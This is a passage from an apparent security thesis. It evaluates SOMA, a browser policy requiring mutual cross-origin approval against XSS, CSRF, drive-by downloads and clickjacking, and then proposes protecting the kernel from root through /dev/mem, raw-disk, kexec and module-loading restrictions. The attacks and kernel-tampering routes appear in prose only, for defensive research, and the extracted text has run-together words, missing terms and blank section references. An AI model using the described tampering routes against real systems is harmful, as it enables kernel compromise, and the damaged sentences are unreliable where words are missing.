served data to an origin site are examined The time frame for these testswas April 2008. The average request size was 10459 bytes. Because manycontent providers are serving up large video, the standard deviation was fairlylarge: 118197 bytes. The median of 2528 bytes is much lower than the aver-age. However, even this smaller median dwarfs the ≈ 20 bytes required fora soma-approval response. As such, we feel it safe to say that the additionalnetwork load on content providers due to SOMA is negligible compared to thedata they are already providing to a given origin site.
Compatibility with Existing Web Pages
To test compatibility with existing web pages, the global top 45 sites as rankedby Alexa were visited in the browser with and without the SOMA add-onNo SOMA compatibility issues were detected. These results were ex-pected, as SOMA was designed for compatibility and incremental deployment.
Drawing from the paper for the performance analysis, the primary over-head in running SOMA is due to the additional latency introduced by having torequest a or from each domain referenced ona web page. While these responses can be cached (like other web requests),the initial load time for a page is increased by the time required to completethese requests. The manifest can be loaded in parallel with the origin page, andso we do not believe manifest load times will affect total page load times. Be-cause files must be retrieved before contacting other servers,however, overhead in requesting them will increase page load times.
Since sites do not currently implement SOMA, SOMA's overhead was es-
timated using observed web request times. First, the average HTTP requestround-trip time for each of 40 representative web sites was on aper-domain basis using PageStats The per-domain average was used be-cause a proxy for the time to retrieve a from a given domain.
Then, to calculate page load times using SOMA, the time to request all contentfrom each accessed domain by the request was estimated forthat domain. The time of the last response from any domain then serves as thefinal page load time.
2The representative sample included banks, news sites, web e-mail, e-commerce, social net-
working, and less popular sites.
Chapter 3. Same Origin Mutual Approval Policy
After running our test 30 times on 40 different web pages, the paper doc-
uments the average additional network latency overhead due to SOMA as in-creasing page load time from 2.9 to 3.3 seconds (or 13.28%) on non-cachedpage loads. On page loads where is cached, the overhead isnegligible. This increase in latency is due to network latency and not CPUusage. If 58% of page loads are assumed to be revisits the average net-work latency overhead of SOMA drops to 5.58%. We expect that this overheadcould further drop should SOMA be implemented within the HTTP headers (asdiscussed in Section
Given that responses are extremely small (see Section
they should be faster to retrieve than the average round-trip time estimate usedin our experiments. These values should therefore be seen as a worst-case sce-nario. In practise, we expect SOMA's overhead to be significantly less.
Protection Against Current Attacks
In order to verify that SOMA actively blocks information leakage, cross-siterequest forgery, cross-site scripting, and content stealing, examples of theseattacks were created. In the paper the SOMA add-on was specifically testedwith following attacks:
1. A GET request for an image on another web site (testing both GET based
cross-site request forgeries as well as content stealing).
2. A POST request to a page on another web site done through JavaScript
(testing POST based cross-site request forgeries).
3. An iframe inclusion from another web site (testing iframe injection based
4. Sending either a cookie or personal information to another web site (test-
ing information leakage).
5. A script inclusion from another web site (testing a bootstrap cross-site
All attacks were hosted at domain A and used domain B as the other domaininvolved. All attacks were successful without SOMA. With SOMA, these at-tacks were all prevented by either a manifest at domain A not listing B or asoma-approval at domain B which returned NO for domain A. We now discussin more detail how SOMA works to block each type of attack.
3.6. A Prototype Implementation
Cross-Site Scripting Bootstrap
While the most general form of a cross-site scripting attack (as discussed inSection does not result in communication with any external sites as thecompromised page is viewed, a subset of cross-site scripting attacks do involveloading additional code from a remote URL. For those attacks the cross-sitescripting exploit is a multi-step process.
The first step involves finding and exploiting a cross-site scripting vulner-
ability as discussed in Section Because many cross-site scripting vul-nerabilities only result in an attacker being able to upload very short snippetsof JavaScript, a common approach is to use the code embedded into the pagethrough the vulnerability as a bootstrap. The bootstrap code loads anotherlonger script which can perform the complex operations that the attacker mayneed to perform to take full advantage of the cross-site scripting vulnerability.
This secondary script is often located on a different external server that theattacker can easily host scripts on.
The second step of exploiting a cross-site scripting vulnerability through
loading additional JavaScript from a different external site is limited by theSOMA manifest in the following way. If the site which hosts the additionalJavaScript is not listed on the manifest, then the bootstrap process will fail. Inorder to exploit a cross-site scripting vulnerability for a site deploying SOMA,the attacker must either embed all the JavaScript attack code in the serverrequest being exploited to perform the attack (assuming the attack code isshort enough to not be truncated/rejected), or the additional JavaScript mustbe hosted on a site listed in the SOMA manifest file.
Unrestricted Outbound Communication
As discussed in Section the ability to scrape potentially sensitive informa-tion from a web page (including form input) and send it to a server controlledby the attacker is a current threat. Similar to how SOMA defends against thecross-site scripting attack, this attack is limited through the use of a SOMAmanifest. If the manifest file does not list the attacker's site as one of the au-thorized external sites, the attempt to send information to the attacker's serverwill fail (since no communication will occur between the browser and attackercontrolled server unless it is on the manifest).
Recursive Script Inclusion
Similar to the cross-site scripting vulnerability listed in Section a recur-sive script inclusion involves a legitimate script loading another script that thedeveloper of the web application did not intend to be loaded. While the author
Chapter 3. Same Origin Mutual Approval Policy
of site A may refer to scripts on domain B, the author may not wish site B toturn around and load scripts from site C.
A common use of recursive script inclusion is ad syndication, as discussed in
Ad syndication has been used in the past as a vector to compromise websites, and hence developers may want to enforce that ad syndication remaindisallowed. To disallow ad syndication, the developer of a web site createsa SOMA manifest specifying the ad server - forcing all ad elements to comedirectly from the ad server, and not through other external sites.
A typical drive-by download is initiated when a victim uses their browser tobrowse a landing web page that is malicious. This landing page may be in-tentionally malicious (e.g., visiting the attacker's site directly) or it may havebecome malicious as a result of being compromised by an attacker. Typically,sites which have been compromised by an attacker are much more likely to re-ceive high volumes of traffic than sites hosted by the attacker directly (e.g., theDolphin Stadium website was compromised by an attacker during the SuperBowl in 2007, embedding a link to malicious JavaScript The maliciousactivities of the landing page are typically hidden in an attempt to keep themalicious actions undetected. To hide the malicious activities of the landingpage, a single reference to a URL will be embedded in it, normally in the formof a script or iframe tag, leaving the rest of the landing web page as it hadappeared before the compromise. Furthermore, malicious content pointed toby the URL will not typically be hosted on the same server as the landing page
For those malicious landing pages that have been compromised by the at-
tacker, SOMA provides a defence. If the site hosting the landing page also hostsa SOMA manifest, the malicious content would have to be hosted on a site listedin the manifest for the attack to succeed. If the malicious content is not hostedon a site listed in the SOMA manifest, browsers enforcing SOMA will not fetchthe malicious content, causing the attack to fail.
The drive-by download attack is very similar to the cross-site scripting at-
tack discussed in Section Both refer to malicious content through a URLembedded on the site and both can be protected against through the use of aSOMA manifest (not listing the attackers server) and SOMA enabled browser.
Cross-Site Request Forgery
As discussed in Section a cross-site request forgery results in requests toa victim site that the web browser user did not intend. These requests, however,
3.7. Related Work
are submitted as part of loading or viewing a page that came from a differentorigin.
SOMA prevents cross-site request forgery when an approval script is used at
the victim site. Any request to the victim will be prefixed with a request to theapprovals script, specifying the origin of the page which is causing the request.
For a cross-site scripting attack, the malicious host would be specified in therequest to the approvals page. In order to prevent the subsequent cross-siterequest forgery, the victim website needs only to answer NO to the approvalsrequest.
As discussed in Section a clickjacking attack involves covering up contenton a web page delivered from the target server with content originating from anattacker. If the base web page is delivered from an attacker controlled serverand content from the target is embedded into it, clickjacking can be mitigatedthrough the use of a SOMA approval script on the target web server. If the baseweb page is delivered from the target web server and the additional maliciouscontent comes from an attacker controlled server, then the use of a SOMAmanifest file which does not include the malicious server as an accepted originwill mitigate the clickjacking attack.
As discussed in Section bandwidth stealing results in content being em-bedded in a web page against the wishes of those responsible for the serverson which the content is hosted. SOMA protects against bandwidth stealing ina way similar to blocking cross-site request forgeries (Section Any re-quest to embed content in a site from a different origin will result in a requestto the victim site for approval. To avoid having content embedded in pagescoming from a different origin, the victim need only answer NO when queriedby a SOMA enabled browser.
Related Work
Because modern browsers are capable of browsing multiple sites concurrently,the objects associated with one site in the browser must be properly segregatedfrom objects related to another in order for the same origin policy to be properlyenforced. Chen et al. examined gaps in current implementations of thesame origin policy related to the ability to view multiple pages concurrently
Chapter 3. Same Origin Mutual Approval Policy
in a browser. They proposed a script accenting mechanism to mark data asassociated with a particular web page, using it to prevent data leakage betweendifferent web pages being viewed within the browser. Barth et al. alsoproposed an algorithm for detecting illegitimate sharing of content within thebrowser. Jackson et al. also focused on communication within the browser,examining how web pages can gain information about other web pages whichhave been viewed in the browser and how to restrict such information leakage.
Ries et al. proposed filtering known-malicious JavaScript at the clientbefore it is processed by the web browser. Their approach focuses on JavaScriptwhich is known to exploit browser bugs. Unlike SOMA, these approaches focuson local rather than remote communication.
Same Origin Policies in Other Domains
The term "same origin policy" is one which has been overloaded, referring todifferent things depending on the context While we use it in this thesisto refer to restrictions placed on the ability of JavaScript to read and modifyobjects tagged with a different origin, there are several other definitions worthmentioning.
Cookie Same Origin Policy
Cookies do not have a same origin policy according to the formal descriptionsof them Regardless, some have termed the policy which dictates abrowser's handling of cookies the same origin policy. Cookies are small stringssent by a server to the browser. The browser holds onto these strings, sendingthem back to the server in the headers of subsequent requests.
The cookie same origin policy is related, but distinct from the JavaScript
same origin policy. The cookie policy refers to how cookies are stored andsent back to the server While any server can set a cookie in thebrowser (subject to additional constraints imposed by the browser), each cookieis associated with a specific domain name. Only requests to a server with thesame domain name as associated with the cookie will receive that cookie whena request is made by the browser. Additional restrictions can further restrictthe sending of cookies to a domain depending on SSL state, port number, orpath name of the specific request.
The HTTP-only cookie extension prevents JavaScript from accessing cookies
which are sent between the client and server, even if the JavaScript has comefrom the same origin as the cookie
3.7. Related Work
SOMA operates at the granularity of requests, restricting fetches for remote
content. If a request is blocked by SOMA, all headers related to the request,including the cookie header, will not be sent to the remote server.
Flash Same Origin Policy
The same origin policy dictates that JavaScript running in a web browser isnot allowed to read content which comes from a different origin than the baseHTML page. Scripts embedded into Flash are not subject to the restrictionsimposed by browser, but instead those imposed by Flash
The Flash same origin policy is very similar to the same origin policy im-
plemented in the web browser, with one exception: for a Flash object comingfrom origin A, requests by the Flash script can be made to origin B if and onlyif B provides a /crossdomain.xml file listing origin A. This allows a script toperform cross-domain requests (in contrast to JavaScript AJAX requests – seeSection
Alternative Methods of Improving JavaScript
Security
NoScript involves the user maintaining a white-list of sites the userauthorizes to run JavaScript. The ability of NoScript to protect the user isdirectly related to the user's ability to maintain the white-list. Indeed, manyrecent versions of NoScript have introduced additional components more in linewith SOMA. These components do not require user intervention and can renderharmless certain clickjacking and cross-site request forgeries – SOMA providesa consistent approach for blocking both (and indeed more web vulnerabilitiesas discussed above). NoScript, with its white list, is not backwards compatible,breaking many existing web sites. We believe that in its current form, NoScriptis unlikely to be enabled by default by any large browser vendor.
Web-based execution environments have all been built with the understand-
ing that unfettered remote code execution is extremely dangerous. SSL andTLS can protect communication privacy, integrity, and authenticity, while codesigning can prevent the execution of unauthorized code. Neitherapproach protects against the execution of malicious code within the browser.
Java was the first web execution environment to employ an execution sand-box and restrictions on initiating network connections The Java pol-icy for restricting network communication was designed to prevent Java appletsfrom communicating to any server other than the one it was retrieved from.
Chapter 3. Same Origin Mutual Approval Policy
Subsequent systems for executing code within a browser, including JavaScript,have largely followed the model as originally embodied in Java applets.
While there has been considerable work on language-based and module-
based sandboxing only recently have researchers begun addressingthe limitations of sandboxing with respect to JavaScript applications.
Alternate Protections Against Specific Web Attacks
There have been many attempts in the past to protect against various web-based attacks. Some, including a proposal related to SOMA by Schuh involve the browser enforcing firewall-style rulesets provided by the origin asa way of protecting against several different attacks. Other approaches focusprimarily on a single type of web attack. These approaches include defencesagainst cross-site scripting and cross-site request forgery as described below.
Cross-site scripting vulnerabilities exist when the parse tree for a page can bemodified in a way not intended by the web application developer. By restrictingchanges to the parse tree generated by the browser, the opportunity exists toeliminate cross-site scripting vulnerabilities. Ter Louw et al. propose Blueprintan approach for generating the parse tree for the web page at the serverand ensuring it is not interpreted differently at the client. Their approach, whilecovering many of the cross-site scripting vulnerabilities not protected againstby SOMA, requires all web application developers to buy in to the approach,redesigning their applications to match the requirements of Blueprint.
Another approach that can be implemented on the server involves perform-
ing dynamic taint tracking (combined with static analysis) to detect the infor-mation flows associated with XSS attacks Noxes is a client-sideweb proxy approach which uses manually and automatically generated rules tomitigate possible cross-site scripting attacks.
Barth et al. proposed a defence against cross-site scripting attacks per-
formed through content sniffing. Their solution involves modifying browsersto restrict content sniffing such that executable JavaScript can not easily beembedded into content uploaded to the web server.
The Mozilla content security policy (previously called site security pol-
icy focuses primarily on mitigating cross-site scripting attacks. It is muchmore complex a policy than SOMA and requires modifications to the web appli-cations themselves. SOMA does not require the same buy-in from web applica-tion developers.
3.7. Related Work
Bojinov et al. introduced a multi-service variant of cross-site scripting,
along with a potential solution. The variant involves injecting the maliciouscontent through a non-web based vulnerability. Such an approach may be fea-sible on devices which host multiple services (e.g., inject a web attack via theftp service). If the injected attack initiates a bootstrap (as discussed in SectionSOMA prevents the bootstrap.
Cross-Site Request Forgery
Several approaches have focused on mitigating cross-site request forgery. Barthet al. proposed a solution to the login based cross-site request forgery us-ing the HTTP Origin header and web application based firewall rules on theserver. Jovanovic et al. proposed a server-side proxy solution where a ses-sion ID is embedded into every link found in the web page generated by theserver. Unless the subsequent request from the client browser contains theunique session ID, it is rejected by the proxy (before it can be processed by thereal web server). Web applications written to defend against cross-site requestforgery attacks are likely to use the standard approach of themselves embed-ding the session ID into each URL sent out by the web server negating theneed for the proxy.
The SOMA approach of using approvals also prevents cross-site request
forgeries from being sent to the web server, but does not require a proxy. In-stead, the browser is responsible for preventing such requests from being sent.
Recently several researchers have focused on the problem of web mashups,which may be created on the client or server. Client-side mashups are com-posite JavaScript-based web pages that draw functionality and content frommultiple sources. To make these mashups work within the confines of same ori-gin policy, remote content must either be separated into different iframes or allcode must be loaded into the same execution context. The former solution is,in general, too restrictive while the latter is too permissive; client-side mashupsolutions are designed to bridge this gap. Two pioneering works in this spaceare Subspace and MashupOS SOMA restricts communicationbetween the web page (browser) and servers while mashup solutions restrictlocal communication between elements on the page.
SOMA breaks client-side mashups which use code hosted on a site not in-
cluded in the manifest. In order for a mashup to work with SOMA, every website involved must be explicitly listed in the manifest and also allow its content
Chapter 3. Same Origin Mutual Approval Policy
to be included (through responding YES to an approvals request). While suchrestrictions may inhibit the creation of new, third party mashup applications,they also prevent attackers from creating malicious mashups (e.g., combina-tions of a legitimate bank's login page and a malicious login box). SOMA isdesigned such that it can be implemented on sites that wish the increased pro-tection that SOMA provides. Mashup sites may choose not to enable SOMA.
SOMA does not affect server-side mashups.
DNS Rebinding Attacks
DNS rebinding attacks are one method of bypassing the current same originpolicy The attack involves rapidly changing the IP address associatedwith a domain name so that multiple unrelated servers are associated withthe same domain name, allowing JavaScript read and modification of contentacross the different physical servers. Karlof et al. proposed a solution tothis which involves tying the origin of a page to the X.509 certificate instead ofthe DNS name.
SOMA operates in the browser using and blocking HTTP requests. It relies
on the web browser for host name to IP address resolution. SOMA is thereforesusceptible to the same DNS rebinding attacks as the browser itself. The pro-tection against DNS rebinding attacks, when implemented in the browser, willalso provide protection to SOMA. One such solution is DNS pinning wherethe browser forces all content for a domain to be fetched from the same IP ad-dress. When applied to SOMA, DNS pinning would result in all content beingfetched form the same IP address as the related SOMA manifest or approvalrequest.
Restricting Information Flows
While the general problem of unauthorized information flow is a classic prob-lem in computer security little attention has been paid in the researchcommunity to the problems of unauthorized cross-domain information flow inweb applications beyond the structures of same origin policy — this, despite thefact that cross-site scripting and cross-site request forgery attacks very heavilyrely upon such unauthorized flows. Of course, the web was originally designedto make it easy to embed content from arbitrary sources. With SOMA, we aresimply advocating that any such inclusions should be explicitly approved byboth parties.
3.8. Final Remarks
While SOMA is a novel proposal, we based the design of soma-approval
and soma-manifest on existing systems. The soma-approval mechanism wasinspired by the crossdomain.xml mechanism of Flash. External contentmay be included in Flash applications only from servers with a crossdomain.
xml file that lists the Flash applications' originating server. Because theresponse logic behind a soma-approval request can be arbitrarily complex, wehave chosen to specify that it be a server-side script rather than an XML filethat must be parsed by a web browser.
The soma-manifest file was inspired by Tahoma an experimental VM-
based system for securing web applications. Tahoma allows users to downloadvirtual machine images from arbitrary servers. To prevent these virtual ma-chines from contacting unauthorized servers (e.g., when a virtual machine hasbeen compromised), Tahoma requires every VM image to include a manifestspecifying what remote sites that VM may communicate with.
Note that individually, Flash's crossdomain.xml and Tahoma's server mani-
fest do not provide the type of protection provided by SOMA. With Flash, a ma-licious content provider can always specify a crossdomain.xml file that wouldallow a compromised Flash program to send sensitive information to the at-tacker. With Tahoma, a malicious origin server can specify a manifest thatwould cause a user's browser to send data to an arbitrary web site, thus causinga denial-of-service attack or worse. By including both mechanisms, we addressthe limitations of each.
It is interesting to note that most of the attacks prevented by SOMA can alreadybe mitigated by web developers properly using existing security mechanisms.
The fact that web application vulnerabilities are so prevalent is a testament tothe inability for web application developers to handle the complexities of de-signing a secure web application. SOMA is designed to greatly simplify thedevelopment of web applications by providing a run-time environment to theweb developer which provides greater isolation and hence a greater level ofsecurity. SOMA focuses on those operations which are inherently dangerousand seeks to limit them. The approach discussed in this chapter does not relyon the end-user for enforcement, is enforced on all web applications using theSOMA enabled browser, and is implemented by guardians (the browser ven-dor and web server administrator). It therefore follows the thesis objective ofproviding a guardian based mandatory access control mechanism which can bedeployed.
In this chapter, we look at a mandatory access control policy mechanism whichalready exists but which has not been fully utilized in many systems – sepa-rating root and kernel-level control. We argue for the increased use of thispolicy mechanism as a method for protecting the kernel (both in Linux andWindows). We examine the protection of the kernel against software runningat lower protection levels, including applications and scripts which execute ona typical system. For the purposes of this chapter, we focus on the protectionlevels common in a typical desktop computer.
While the focus of this chapter is on applications running with root level privi-leges and their ability to modify other elements on a desktop, as background wefirst review the different protection levels which exist within a modern desktop.
A Permission Hierarchy
The modern desktop computer system is composed of a number of differentprotection level layers that have been designed to segregate different elementsof the system These protection levels are illustrated in Figure Withineach stack (software, or any system device), all the higher protection level el-ements can read and write to areas occupied by the elements at the lowerprotection levels. We now discuss each of the protection levels as well as whataspect of the desktop system is responsible for maintaining the separation be-tween the protection levels. We do not examine the possibility of malicious
hardware in this thesis.
Figure 4.1. Enforcement between protection levels in a modern desktop.
A System Device
Typically, system devices are composed of hardware and firmware working to-gether to provide functionality. The hardware hooks into the system bus andexposes the functionality provided by the device (e.g., for an optical drive, thisallows the software stack to access certain properties of the drive as well as thedata on any inserted optical disk).
The privileges of the device firmware, including its ability to interact with
the rest of the system, are dictated by the underlying hardware (both that ofthe device the firmware is run on, as well as hardware the device is connectedto). These restrictions can be in the form of specific hardware limits imposedto prevent damage or limits in the form of functionality which is simply notmade available to the firmware. As an example, the range of motion for theread head for an optical drive is limited by the firmware, while the ability toprevent writing to optical media may be prevented by simply installing a lasernot powerful enough to actually ‘burn' media.
Many devices are built in such a way that the firmware can be upgraded.
For these devices, the new firmware must transition from the software stack to
Chapter 4. Limiting Privileged Processor Permission
the system device. If either the CPU or hardware on the system device disal-lows the upgrading of firmware, the upgrade will fail. A similar situation occursfor those devices that do not store their own firmware in non-volatile memorybut instead rely on the software to re-upload the firmware during system ini-tialization. This situation is similar to the upgrading of firmware, but happenson a more frequent basis. In Figure we illustrate the firmware that getssent to the system device as being contained within the hypervisor layer. Whilethe firmware can in fact also be housed at any lower protection layer in thesoftware stack (and be subject to the privilege restrictions of all the higher pro-tection levels as it transitions onto the system device), firmware modified andstored at any lower protection level may present a way of bypassing the pro-tection mechanisms imposed on the lower protection levels. Firmware malcodeexploits this ability to circumvent the protection levels within a desktop and indeed methods of protecting against firmware malware have also alreadybeen proposed
The Software Stack
The most visible protection level stack that exists on a common desktop is thesoftware stack. As illustrated in Figure it includes the processor, potentiallya hypervisor, operating system kernel, applications, and scripts. At the base ofthe software stack is the CPU, the processor that all the software runs on. Theprocessor is responsible for many of the protection mechanisms used to keepother elements in the software stack at their respective protection levels. Itdoes this through a combination of two mechanisms, the paging subsystem andthe privilege level subsystem
The paging subsystem presents a translation layer between the virtual ad-
dresses used by software running on the processor and the physical addressescorresponding to the actual location in memory that is being referenced. Eachblock of virtual memory can be mapped to an arbitrary block of physical mem-ory, with the exact mapping being maintained as an entry in the page table. Theprocessor restricts the ability to update the page table to only privileged code(i.e., the OS kernel). The OS kernel is responsible for maintaining this mapping(for the moment, we will assume a hypervisor is not present). When an applica-tion is being run, the page table mappings are configured to allow access onlyto physical memory allocated to the currently running application. Becausethe mapping is controlled by the operating system, the application is restrictedfrom accessing memory belonging to other applications on the system. Whilethe OS kernel shares the same page table as the application, memory associ-ated with the kernel remains protected through a privilege level bit enforcedby the processor.
In its simplest form, the privilege level subsystem of a modern processor is
a single bit, indicating whether the currently executing instructions have priv-ileged or user level control of the processor Privileged mode is normallyassociated with the operating system kernel, with user mode being associatedwith all other code which is running. This separation between privileged anduser mode is not the same as is commonly referred to in many access controlsystems (more on this later). In addition to some assembly instructions onlybeing accessible to code running with privileged control, the paging subsystemis capable of restricting access to memory based on whether the code currentlyrunning is privileged. A specific page of memory can be indicated as read-onlyfor any user code running but read/write for privileged code. The OS kerneluses this privileged bit and associated access restrictions in the page tablesto prevent user code from writing to pages belonging to the operating system(including memory pages containing the page tables themselves). Any attemptby user code to either execute privileged assembly instructions or modify read-only pages of memory is trapped by the processor and forwarded to the priv-ileged code. The privileged code can either reject the attempt or emulate theoperation on behalf of the user code.
This setup, with the OS kernel being privileged and all other code being
restricted in the operations it can perform, provides the basis for the softwareprotection level stack. When a hypervisor is inserted into the mix, it becomesthe code to which privileged permission is given by the processor and the OSkernel is instead run with user processor protection. Any attempt by the OSkernel to then execute privileged operations can be caught by the hypervisorand handled accordingly. The hypervisor can also ensure that the OS kernel iskept separated from other code running with user permission.
For scripts that execute in the software stack, it is the job of the script inter-
preter to impose any desired restrictions on the script. The script interpreter,in turn, is restricted by the operating system, and so on down the chain. A goodexample of this is JavaScript running in a browser, which is prevented fromaccessing the local file-system even though the browser itself can access files(subject to constraints imposed by the OS kernel). The same holds true for Java,where the byte code is interpreted and controlled by the JVM, which in turn isan application controlled by the OS kernel.
Methods of Modifying Kernel Code
On a modern desktop system, almost all code is run with user level processorcontrol, regardless of the access control mechanisms being imposed (indeed, itis the job of the OS kernel to impose any additional access control restrictions
Chapter 4. Limiting Privileged Processor Permission
required for the system). Every single application, even those run by root, isstill run as user code as far as the processor is concerned.
Because all applications are run with user level processor control, they do
not have the same privileges as those given by the processor to the OS kernel.
Instead, they need to request that certain operations be done by the OS kernelon their behalf (so that they are allowed by the processor). The OS kernel itselftypically restricts the interfaces that are available for changing itself (and henceallowing new code to run with privileged processor permission). Typically, theOS kernel will provide a few interfaces for extending its code.
Physical Memory Access
The kernel may export to applications an interface which allows arbitrary ac-cess to the physical memory of the machine This allowsan application to:
1. Talk to hardware mapped into memory.
2. Read from and write to memory allocated to another application already
running on the system.
3. Read from and write to memory allocated to the kernel.
Because this interface allows arbitrary modifications to all code currently re-
siding in memory, permission to use this interface is normally restricted by theOS kernel to only applications running with the highest privileges (superuser).
On Linux, this interface is typically a device node labelled as /dev/mem. Anotherrelated device node which only exposes kernel memory for reading and writingis /dev/kmem. On Windows, the device node for modifying physical memory is Device PhysicalMemory
A second way of expanding the OS kernel with new code that is consideredprivileged is through loading a kernel module Kernel modules allownew code to be inserted into the kernel and run as privileged by the processor.
This provides a structured stable way of expanding the functionality of the OSkernel (as opposed to modifying the kernel through physical memory access,which tends to be fragile).
4.2. The Protection Mechanism
In a modern kernel, the swap (or page) area on disk is designated for excessmemory allocated by a process which is not currently being stored in physicalmemory The contents of physical memory are written (or paged) to diskand the physical memory reassigned by the OS kernel.
A related kernel interface provides applications with the ability to read from
and write directly to storage, bypassing the file-system and associated accesscontrols. Performing such reads and writes is typically referred to as perform-ing raw disk I/O. When the ability to write to storage is combined with the ker-nel paging to disk, applications inherit the ability to modify memory potentiallyassociated with other applications. If portions of kernel memory are paged outto disk, applications also can modify the kernel though writing to the area ofdisk occupied by swap
Kernel Image
When a system first boots, the kernel must be loaded from somewhere beforeit can start running. If an application has the ability to write to the area of diskoccupied by the kernel, the application can modify the code which is run withprivileged processor permission after the next reboot of the system. To protectthe kernel, we must ensure that the kernel image on disk can not be updatedby malware. We must also ensure that the boot loader (e.g., GRUB whichis responsible for loading the kernel, cannot be modified by malware. In thisthesis, we do not consider the case where the physical media is inserted intoan alternate machine and then the kernel is updated.
Replacing the running kernel image is possible in Linux through the kexec
system call This functionality allows the booting of arbitrary code on analready-running system, giving it privileged processor control. To protect thekernel, we must also disable the running of arbitrary code through kexec.
The Protection Mechanism
To date, root or supervisor level control of a system has been closely associatedwith kernel level control. They are, in fact, not the same. All applications runas user and the kernel runs as privileged as far as the processor is concerned.
The kernel is also in charge of enforcing the protections associated with rootand other user accounts, while not having to follow them itself. Many kernellevel rootkits have taken advantage of the extra power that comes from beingpart of the OS kernel and running with privileged processor control.
Chapter 4. Limiting Privileged Processor Permission
There exists, however, an opportunity to keep root and privileged CPU con-
trol distinct. Because there are only a few ways of elevating one's privilegesbetween the two (as discussed in Section one can concentrate on theseselect areas to increase the protection afforded to privileged code, protectingthe kernel against threats by root level applications. To enforce the protectionmechanism, one only needs to implement additional restrictions on the limitednumber of methods available for escalating from root application level controlto privileged processor control. We do this by restricting access to those meth-ods which are discussed in Section We document these restrictions inSections through We believe that protecting the kernel in this wayis beneficial. Malware exploitation of the kernel is a growing trend andothers in the security community have already made an effort to protect thekernel in complementary ways (we discuss such approaches in Section
The protection mechanisms discussed in this chapter must all be imple-
mented on a system in order to prevent code from gaining privileged processorpermission. The mechanisms, however, do not need to be deployed across allinstalls of Linux in order for the benefits of protecting the kernel to be real-ized. The approach discussed in this thesis is incrementally deployable (at thegranularity of a system).
Restricting Memory Access
In restricting access to privileged processor code, the first step we discuss isdisabling write access to memory occupied by the OS kernel. On Linux, thisinvolves restricting write access to /dev/mem and /dev/kmem. Restrictions tothese device nodes have already been implemented in Linux by others, andneed only be enabled. As of Linux version 2.6.26 the option exists tolimit access through /dev/mem to only those areas of physical memory associ-ated with IO (e.g., the graphics card). All areas of the physical address spaceassociated with RAM can not be written to through /dev/mem when the option isenabled. The ability to disable access to kernel memory through the /dev/kmemdevice node has also been configurable since 2.6.26 Before being intro-duced in the mainline Linux kernel, the options had been used in Fedora andother Red Hat kernels for 4 years without any known problems /dev/memcannot be disabled entirely as X (the graphical display manager typically usedin Linux) uses it to communicate with the video card.
In Windows, the writes directly to physical memory are accomplished by
using the Device PhysicalMemory device This device, however, has beendisabled by Microsoft since Windows 2003 SP1
4.2. The Protection Mechanism
Restricting Access to Disk
Because the OS kernel is responsible for mediating all access to the underlyinghardware on a system, it has the ability to control access to the underlyingdisks. By restricting access to those areas of the disk being used by swap,writes to swap can be prevented (and hence the integrity of kernel memory canbe protected). To fully prevent against the kernel being modified, the areas ofdisk occupied by kernel modules, the core kernel, and the boot loader also needto be protected against arbitrary modification. Arbitrary writes to sectors of thedisk occupied by any of these elements need to be restricted (i.e., a root levelprocess must not be allowed to perform arbitrary writes to either /dev/hda or/dev/hda1 if they contain kernel-related elements).
Raw Disk Access
In restricting raw disk access, we implement a simple protection rule whichis sufficient to protect against all of the kernel elements being modified. Anypartition actively being used by the OS kernel (either mounted or being usedas swap) can not be written to via the raw interface. This includes both parti-tions used as swap as well as any partition with a file-system that is currentlymounted. We focus on raw writes in this thesis, not restricting raw read opera-tions.
The disabling of raw writes to partitions that have been mounted has a side
benefit. For those partitions that have been mounted, the kernel maintainsa cache of recently used disk blocks to increase efficiency. Writes to the un-derlying disk for any block being cached by the OS are not guaranteed to bepreserved, leading to potential corruption of the file-system.
While Linux currently does not implement such restrictions, such a restric-
tion is beneficial for both from the stability and security standpoint. In ourprototype, we extend the kernel to implement such a restriction. Microsoft'sWindows Vista implements similar restrictions on accessing raw disk blocksBecause the boot loader in general often exists outside the file-systemthat is exported to user-space applications, the act of disabling writes to theraw disk has the additional advantage of protecting the boot loader.
File Access
If raw disk writes are disabled, the only way left of modifying the swap file,kernel, modules, or boot loader on disk is through the standard open, read,write, and close system calls associated with files. Access control on these file-system operations is enforced by the OS kernel. To protect the swap file, thekernel need only prevent an application from opening and writing to the swap
Chapter 4. Limiting Privileged Processor Permission
file. In Linux, the ability to modify the swap file is not normally separate fromthe ability to modify other files on the system. To protect the swap file, thekernel needs to be extended to treat the swap file as special and disallow writeattempts, even those done by root. Windows Vista already employs such anapproach to prevent modifications to the page file
The core kernel and related modules on disk are also commonly available as
files on the file-system. While the naïve approach to protecting such elementswould be to disallow all updates to these files, such a solution does not al-low upgrades. To allow upgrades, an approach such as bin-locking discussed inChapter can be used. Because the kernel and related module files are all bina-ries on disk, the bin-locking approach is well suited to protecting them againstarbitrary modification. The boot loader can also be protected by treating thearea of disk occupied by the boot loader as a binary file and using bin-locking.
To prevent new arbitrary code from executing on a system with privileged pro-cessor control, one must also restrict the loading of kernel modules. The com-monly accepted way of restricting these is through the use of kernel modulesigning. While not currently accepted into the mainline Linux kernel, a patchdoes exist to implement kernel module signing It enforces that only mod-ules signed with the private key corresponding to the public key embedded inthe OS kernel can be loaded to extend the kernel. The signature is containedwithin an ELF The public key is embedded into the core OS kernel dur-ing compile time. Only someone in possession of the private key can create akernel module which verifies and is loaded into the running kernel. WindowsVista introduced a similar approach, preventing arbitrary kernel modules frombeing loaded
Updating the Kernel Image
While only an issue when the machine is rebooted, updating of the kernel imageis nevertheless still an avenue through which the OS kernel can be modified.
To prevent modifications to the OS kernel, an approach like bin-locking (intro-duced in Chapter can be used to restrict updating the kernel image. Wediscuss such an approach above in Section
To prevent updating the running kernel image through kexec, we must limit
the kernels that are allowed to be started by calling the kexec system call. Inlimiting the kernels allowed to be run through kexec, we prevent arbitrary code
from running with privileged processor control. In current (unmodified) ker-nels, kexec is by default disabled, and set by the compile option CONFIG_KEXEC.
Furthermore, the option is only available for X86 processors.
While certain hardware configurations may provide additional methods of gain-ing write access to kernel memory, we believe that the OS kernel device driversresponsible for the underlying hardware can be modified to remove vulnerabil-ities caused by specific hardware. This may involve restricting both the inter-face and operations exposed to applications. This requires further exploration,but is beyond the scope of this thesis. The exact method for ensuring hardwaredoes not allow additional code to run with privileged processor control is highlydependent on the exact hardware being examined.
